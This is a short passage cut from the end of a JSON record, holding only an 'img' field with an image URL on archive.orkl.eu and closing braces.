		"img": "https://archive.orkl.eu/9da82963106b91cf0e93addc4504bf8bcd969f26.jpg"
	}
}